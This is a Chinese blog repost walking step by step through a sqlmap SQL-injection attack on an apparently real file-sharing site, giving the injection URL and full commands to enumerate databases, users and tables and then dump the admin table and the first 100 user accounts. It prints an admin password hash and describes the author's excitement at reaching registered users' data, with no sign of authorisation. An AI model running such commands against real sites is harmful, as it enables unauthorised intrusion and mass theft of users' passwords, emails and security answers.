SQLMAP注入拖库过程

最新推荐文章于 2024-02-04 21:39:43 发布

mydriverc2

最新推荐文章于 2024-02-04 21:39:43 发布

阅读量5.8k

点赞数 1

分类专栏： Web类网络

网络同时被 2 个专栏收录

103 篇文章 1 订阅

订阅专栏

Web类

90 篇文章 1 订阅

订阅专栏

http://hi.baidu.com/betafish/item/8be96093cc2a8aab82d2953c

SQLMAP注入拖库过程

--冰锋刺客

SQLMAP是一款开源的渗透测试程序，它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据；当然，最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。

渗透开始-->

注入点: "http://so.126disk.com/search?key=A"

测试环境: BackTrack 5 / SQLMAP 0.9

#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dbs

// 列举数据库 --> 126disk , information_schema

#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --current-db

// 当前数据库 --> 126disk

#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --users

// 列数据库用户

#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --current-user

// 当前用户

#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --tables -D "126disk"

// 列举数据库126disk的表名

获取表名

+---------------------+
disk_admin
disk_adminlog
disk_adminmsg
disk_collection
disk_count
disk_file
disk_gonggao
disk_guolv
disk_haoyou
disk_integral
disk_integrallog
disk_jubao
disk_link
disk_links
disk_message
disk_mulu
disk_search
disk_server
disk_tag
disk_type
disk_user
disk_userlog
disk_visitors
disk_zhuanji
+----------------------+

#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --columns -T "disk_admin" -D "126disk"

// 获取表disk_admin的列名

#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dump -C "id,login,pass,user" -T "disk_admin" -D "126disk"
// 获取表disk_admin中的数据，包含列 id,login,pass,user --> 1|9|admin|8e8df10cbce2ef46c3d25c3a5f7fe159

#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --columns -T "disk_user" -D "126disk"
// 获取表disk_user的列名

当看到这些列名时，心中是莫名的激动。里面可都是注册用户的数据啊

#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dump -C "id,name,pass,email,wenti,daan" -T "disk_user" -D "126disk" --start 1 --stop 100

// 获取表disk_user的前100条数据，包含id,name,pass,email,wenti,daan；这里已经开始拖库了